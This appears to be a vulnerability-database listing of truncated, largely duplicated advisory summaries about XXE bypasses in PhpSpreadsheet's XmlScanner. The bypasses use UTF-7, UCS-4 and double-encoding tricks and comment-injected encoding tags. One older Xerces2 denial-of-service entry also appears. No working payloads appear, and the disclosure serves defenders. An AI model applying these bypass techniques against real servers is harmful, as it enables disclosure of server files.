EUVD-2024-3279

Malicious code in bioql PyPI...

XML External Entity (XXE) Injection

Overview Affected versions of this package are vulnerable to XML External Entity XXE Injection via the scan method in the XmlScanner class. Exploiting this vulnerability is possible when using a UTF-7 encoded payload, including at the end of the file a comment with the value encoding="UTF-8" with...

CVE-2024-48917

PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. The XmlScanner class has a scan method which should prevent XXE attacks. However, in a bypass of the previously reported CVE-2024-47873, the regexes from the findCharSet method, which is used for determining the current...

XXE in PHPSpreadsheet's XLSX reader

Summary The XmlScanner class has a scan method which should prevent XXE attacks. However, we found another bypass than the previously reported CVE-2024-47873, the regexes from the findCharSet method, which is used for determining the current encoding can be bypassed by using a payload in the...

GHSA-7CC9-J4MV-VCJP XXE in PHPSpreadsheet's XLSX reader

Summary The XmlScanner class has a scan method which should prevent XXE attacks. However, we found another bypass than the previously reported CVE-2024-47873, the regexes from the findCharSet method, which is used for determining the current encoding can be bypassed by using a payload in the...

GHSA-JW4X-V69F-HH5W XmlScanner bypass leads to XXE

Summary The XmlScanner class has a scan method which should prevent XXE attacks. However, the regexes used in the scan method and the findCharSet method can be bypassed by using UCS-4 and encoding guessing as described in . Details The scan method converts the input in the UTF-8 encoding if it is...

XmlScanner bypass leads to XXE

Summary The XmlScanner class has a scan method which should prevent XXE attacks. However, the regexes used in the scan method and the findCharSet method can be bypassed by using UCS-4 and encoding guessing as described in . Details The scan method converts the input in the UTF-8 encoding if it is...

CVE-2024-48917

CVE-2024-48917 (PhpSpreadsheet XXE bypass) : The XmlScanner in PhpSpreadsheet can be bypassed via the encoding detection logic (findCharSet) when processing XML with UTF-7 payloads, allowing an XML External Entity attack. A comment injection at the end of the file encoding tag (e.g., encoding="UT...

CVE-2024-48917 XXE in PHPSpreadsheet's XLSX reader

PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. The XmlScanner class has a scan method which should prevent XXE attacks. However, in a bypass of the previously reported CVE-2024-47873, the regexes from the findCharSet method, which is used for determining the current...

XML External Entity (XXE) Injection

Overview phpoffice/phpspreadsheet is a Spreadsheet engine that Read, Create and Write Spreadsheet documents in PHP . Affected versions of this package are vulnerable to XML External Entity XXE Injection due to the usage of improperly secured regular expressions in the scan and findCharSet methods...

XML External Entity (XXE) Injection

Overview Affected versions of this package are vulnerable to XML External Entity XXE Injection due to the usage of improperly secured regular expressions in the scan and findCharSet methods of the XmlScanner class. By exploiting UCS-4 encoding and encoding guessing techniques, attackers can...

CVE-2024-47873

PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. The XmlScanner class has a scan method which should prevent XXE attacks. However, prior to versions 1.9.4, 2.1.3, 2.3.2, and 3.4.0, the regexes used in the scan method and the findCharSet method can be bypassed by using...

CVE-2024-47873 PhpSpreadsheet XmlScanner bypass leads to XXE

PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. The XmlScanner class has a scan method which should prevent XXE attacks. However, prior to versions 1.9.4, 2.1.3, 2.3.2, and 3.4.0, the regexes used in the scan method and the findCharSet method can be bypassed by using...

CVE-2024-47873

PhpSpreadsheet's XML scanner contains a bypass that can enable XML External Entity (XXE) attacks. The findCharSet/scan logic can be bypassed by encoding tricks (e.g., UCS-4, UTF-7) and encoding guessing, allowing sanitizers to be circumvented. Affected versions are prior to 1.9.4, 2.1.3, 2.3.2, a...

CVE-2024-47873 PhpSpreadsheet XmlScanner bypass leads to XXE

PhpSpreadsheet is a PHP library for reading and writing spreadsheet files. The XmlScanner class has a scan method which should prevent XXE attacks. However, prior to versions 1.9.4, 2.1.3, 2.3.2, and 3.4.0, the regexes used in the scan method and the findCharSet method can be bypassed by using...

PT-2024-32865

Name of the Vulnerable Software and Affected Versions PhpSpreadsheet versions prior to 1.9.4, 2.1.3, 2.3.2, and 3.4.0 Description The XmlScanner class in PhpSpreadsheet has a scan method that is intended to prevent XXE attacks. However, the regexes used in the scan method and the findCharSet meth...

XML External Entity (XXE) Injection

Overview phpoffice/phpspreadsheet is a Spreadsheet engine that Read, Create and Write Spreadsheet documents in PHP . Affected versions of this package are vulnerable to XML External Entity XXE Injection through the toUtf8 function in the XmlScanner.php file. An attacker can disclose server files...

SUSE CVE-2009-2625

XMLScanner.java in Apache Xerces2 Java, as used in Sun Java Runtime Environment JRE in JDK and JRE 6 before Update 15 and JDK and JRE 5.0 before Update 20, and in other products, allows remote attackers to cause a denial of service infinite loop and application hang via malformed XML input, as...

XXE in PHPSpreadsheet due to incomplete fix for previous encoding issue

PHPOffice PhpSpreadsheet before 1.8.0 has an XXE issue. The XmlScanner decodes the sheet1.xml from an .xlsx to utf-8 if something else than UTF-8 is declared in the header. This was a security measurement to prevent CVE-2018-19277 but the fix is not sufficient. By double-encoding the the xml...

GHSA-VVWV-H69M-WG6F XXE in PHPSpreadsheet due to incomplete fix for previous encoding issue

PHPOffice PhpSpreadsheet before 1.8.0 has an XXE issue. The XmlScanner decodes the sheet1.xml from an .xlsx to utf-8 if something else than UTF-8 is declared in the header. This was a security measurement to prevent CVE-2018-19277 but the fix is not sufficient. By double-encoding the the xml...